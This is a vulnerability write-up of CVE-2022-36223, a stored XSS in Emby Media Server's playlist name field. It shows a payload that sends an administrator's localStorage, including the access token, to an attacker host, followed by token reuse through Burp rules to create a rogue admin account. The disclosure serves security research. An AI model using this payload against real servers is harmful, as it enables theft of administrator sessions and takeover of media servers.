CVE-2022-36223 / Administrator Account Takeover in Emby Media Server
What is Emby?
Emby is a media server designed to organize, play, and stream audio and video to a variety of devices.
This vulnerability is present in version 4.6.7.0.
Analyzing the Application
Since I am a fan and user of Emby I decided to do some security testing.
To start the tests, we have two user accounts:
Administrator -> cupcake
Unprivileged user -> test
Logged in as the test user, I decided to create a playlist as shown below.
Let's test whether the "playlist name" field is vulnerable to Cross-Site Scripting (XSS).
Payload used in the test:
<img src="x" onerror="alert('XSS')" />
Playlist name vulnerable to XSS! ≖‿≖
Now let's log in as cupcake (administrator) and see whether the payload created by the test user will trigger.
Knowing that the playlist name is vulnerable to XSS, we can insert a payload to steal the administrator user's access token.
I created a new playlist whose payload sends localStorage to my VPS; from it we will get the access token of the server administrator (cupcake).
Payload used in exploitation:
<img src=x onerror="document.location='http://MYIP:PORT/?'+(JSON.stringify(localStorage))">
On the attacker's VPS we open netcat and listen on port 8595, waiting for our target to access the malicious playlist.
When the administrator logs in and opens the menu on the left, the payload is triggered automatically and sends us the localStorage with the server administrator's valuable information.
I received the localStorage and now I will analyze the JSON.
As we can see, the data is URL-encoded; to decode it I like to use the Burp Suite decoder.
Decoder -> Decode as > URL
Another option is urldecoder; you can access it here:
After running a URL decode we can analyze the obtained data and see the data of the user cupcake, its ID, and the policy confirming that it is the administrator of the server: Policy:IsAdministrator:true
Below in the JSON we can see the administrator's AccessToken, right after its UserId. ᕕ(¬ ͜ ¬)ᕗ
With this data I created some rules in Burp Suite under Match and Replace.
Burp Suite's Match and Replace rules let you change parts of a request and of a response, which can be a significant help when testing web applications.
I used the rules to replace the User ID and Token of the user test with those of the administrator cupcake.
User Test = No Privileges
User ID: 420f56e9a1be4f0d9fd6ab87846d908b
Access Token: 66463fb77a4546b58c10b47b4f9ff9ad
User cupcake = Administrator
User ID: a85f0f15dec24393bd82c270bef8a8d0
Access Token: 6732867f6cb04b03aeee22b9f03d6b44
After creating the rules, logged in as the test user, I clicked on Settings and was able to load the admin panel, even though I was logged in as the unprivileged user.
With the Match and Replace rules we are not able to elevate the privileges of the test user itself, but we can create a new user with a server administrator profile.
Logged in with the new administrator user: pwned
Conclusion:
As the gif above shows, I was able, through an XSS, to steal the admin user's ID and token, abuse that information from an ordinary user account, and create a new user on the server with an admin profile.